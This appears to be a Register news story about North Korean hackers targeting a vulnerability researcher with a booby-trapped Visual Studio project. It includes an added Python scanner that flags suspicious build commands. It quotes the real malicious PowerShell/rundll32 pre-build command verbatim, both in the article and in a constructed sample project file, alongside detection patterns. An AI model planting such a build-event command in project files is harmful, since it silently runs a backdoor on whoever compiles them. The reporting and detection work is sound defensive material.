
I was targeted by North Korean 0-day hackers using a Visual Studio project, vuln hunter tells El Reg

Hyperion Gray founder relates 'holy f**k' moment when he realised

A zero-day hunter has told The Register of the “holy f**k” moment when he realised he'd been targeted by a North Korean campaign aimed at stealing Western researchers' vulns.

Alejandro Caceres said he "thought it was insane" that he had been targeted by state-backed malicious people operating as part of a campaign revealed last night by Google’s Threat Analysis Group (TAG).

"When I read the Google thing I honestly think I said out loud 'holy fuck', I thought it was insane. Attacked by a nation state? Me!?" Caceres, co-founder of the Hyperion Gray security research company, told El Reg.

Enraged by the deception, Caceres also offered a hefty bounty for information leading to the arrest of "James Willy", who appears to be one of the North Korean actors engaged in the Pyongyang-driven campaign.

Google's TAG said last night it had uncovered "an ongoing campaign targeting security researchers working on vulnerability research and development." It attributed these attacks to "a government-backed entity based in North Korea." As we reported, the country was targeting infosec professionals through a variety of methods, including Twitter, LinkedIn and Telegram – but there was a little more to it in Caceres' case.

A vulnerability broker he had known for a while and trusted had introduced him to a new researcher called James Willy "from New York," Caceres told El Reg, explaining: "We hopped in a group chat, the three of us, and he sent me a Visual Studio project to take a look at a driver bug that caused a blue screen of death."

Vuln brokers are (occasionally shady) people who buy and sell methods of exploiting vulnerabilities in software products. Normally they're most interested in so-called zero-days: previously unknown vulnerabilities that have existed since "day zero" of a program’s lifespan, as Reg readers know. These are obviously valuable to criminals, nation states and legitimate security pros alike.

As for the BSOD, "James" told Caceres and the vuln broker that it was linked to Google Chrome – an instant attention-grabber for bug hunters. Vulns affecting software used by tens of millions worldwide are rare and command hefty rewards.

Speculate to accumulate

When he opened the Visual Studio project from "James", Caceres admitted he had been a little careless but shrugged off the risk. After all, this was somebody who had been vouched for – and the zero-day was genuine.

"The code was all legit, it was a real crash with potential security implications, but I wasn't careful when I opened the Visual Studio project," he sighed. "Since this guy was semi-known I thought nothing of it. And I was able to confirm the 0-day vulnerability, the code compiled just fine, I understood what it was doing (attacking a graphics driver) and all was good, or so I thought."

Opening some Visual Studio projects can cause code to execute, which was the North Koreans' attack vector.

[Image: A Google portmanteau of Twitter accounts used in the North Korean campaign. "James Willy" is at top right]

An arrangement to write up and credit "James" for his research fell through and Caceres put the episode out of his mind. Until, four or five days later, his broker friend "told me he got wind of the guy trying to backdoor someone else's machine with a Visual Studio phishing trick." Sure enough, Caceres found the smoking gun buried in the VS project sent to him by "James":

powershell -executionpolicy bypass -windowstyle hidden if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path x64\Debug\Browse.VC.db)){rundll32 x64\Debug\Browse.VC.db,ENGINE_get_RAND 6bt7cJNGEb3Bx9yK 2907}
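The command above is the kind of thing MSBuild will happily run from a build event when a project is compiled, which is why "the code compiled just fine" was no reassurance. As an added example (not code from the article, from Hyperion Gray or from Google TAG), the script below parses a .vcxproj and lists every build-time command it contains, flagging the indicators a reviewer would want to see before building a project received from a third party. The sample project file is constructed for the example; its PreBuildEvent carries the command quoted in the article, and the indicator patterns and the `scan_project` / `extract_build_commands` names are this example's own.

```python
"""Scan a Visual Studio project (.vcxproj) for build-time command execution.

A .vcxproj is MSBuild XML. Commands placed under PreBuildEvent, PostBuildEvent,
PreLinkEvent or CustomBuildStep, and in <Exec Command="..."> tasks, are run by
MSBuild on the machine that builds the project.
"""
import re
import xml.etree.ElementTree as ET

# Element names whose <Command> child MSBuild executes during a build.
EVENT_ELEMENTS = ("PreBuildEvent", "PostBuildEvent", "PreLinkEvent", "CustomBuildStep")

# Heuristic indicators (this example's own choices, not an exhaustive list).
SUSPICIOUS = [
    ("powershell_bypass", re.compile(r"powershell[^\n]*-executionpolicy\s+bypass", re.I)),
    ("hidden_window", re.compile(r"-windowstyle\s+hidden", re.I)),
    # rundll32 pointed at a file whose extension is not .dll (e.g. a disguised DLL);
    # a dotted directory name in the path can also trip this, which is acceptable here.
    ("rundll32_nondll", re.compile(r"rundll32\s+\S+\.(?!dll\b)\w+", re.I)),
    ("encoded_command", re.compile(r"-enc(odedcommand)?\s", re.I)),
]

# Constructed sample project: one benign post-build copy, one benign Exec task,
# and a PreBuildEvent carrying the command quoted in the article.
SAMPLE_VCXPROJ = r"""<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
    </ClCompile>
    <PreBuildEvent>
      <Command>powershell -executionpolicy bypass -windowstyle hidden if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path x64\Debug\Browse.VC.db)){rundll32 x64\Debug\Browse.VC.db,ENGINE_get_RAND 6bt7cJNGEb3Bx9yK 2907}</Command>
    </PreBuildEvent>
    <PostBuildEvent>
      <Command>xcopy /y "$(OutDir)$(TargetName).dll" "$(SolutionDir)bin"</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <Target Name="AfterBuild">
    <Exec Command="echo build finished" />
  </Target>
</Project>
"""


def _local(tag: str) -> str:
    """Strip the MSBuild XML namespace from an element tag."""
    return tag.split("}")[-1]


def extract_build_commands(vcxproj_xml: str) -> list[tuple[str, str]]:
    """Return (location, command) pairs for every build-time command in the project."""
    root = ET.fromstring(vcxproj_xml)
    found = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in EVENT_ELEMENTS:
            for child in el.iter():
                if _local(child.tag) == "Command" and child.text and child.text.strip():
                    found.append((tag, child.text.strip()))
        elif tag == "Exec" and el.get("Command"):
            found.append(("Exec", el.get("Command").strip()))
    return found


def scan_project(vcxproj_xml: str) -> list[dict]:
    """Return one finding per build command that matches any SUSPICIOUS pattern."""
    findings = []
    for location, command in extract_build_commands(vcxproj_xml):
        hits = [name for name, pattern in SUSPICIOUS if pattern.search(command)]
        if hits:
            findings.append({"location": location, "indicators": hits, "command": command})
    return findings


if __name__ == "__main__":
    for loc, cmd in extract_build_commands(SAMPLE_VCXPROJ):
        print(f"[{loc}] {cmd}")
    for finding in scan_project(SAMPLE_VCXPROJ):
        print(f"SUSPICIOUS {finding['location']}: {', '.join(finding['indicators'])}")
```

Run against the constructed sample, the post-build xcopy and the echo task are listed but not flagged, while the PreBuildEvent is reported with the powershell_bypass, hidden_window and rundll32_nondll indicators. The same walk over `Exec` tasks and build events applies to hand-written .targets and .props files a project imports, which is where such a command can also hide.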

"My thought was that if this was not legit they'd use some trash code," Caceres told The Register. "But the 0-day was very real, if still rudimentary, so it made me comfortable that the guy really just needed help with it."

Caceres speculated that the North Koreans wanted access to his machine so that they could hunt through it for other vulns to steal and exploit, in a form of speculating to accumulate. Burning low-impact zero-days to potentially gain high-impact zero-days from a dedicated researcher seems, if nothing else, credible.

Last year the US-CERT warned that North Korean hackers were targeting wealthy Western companies for protection money, and it might be the case that the zero-day theft operation which targeted Caceres and others is linked to that tactic.

Sometimes – just sometimes – those evil nation state hackers really are coming after you. Being an ordinary bughunting pro doesn't make you less of a target. ®
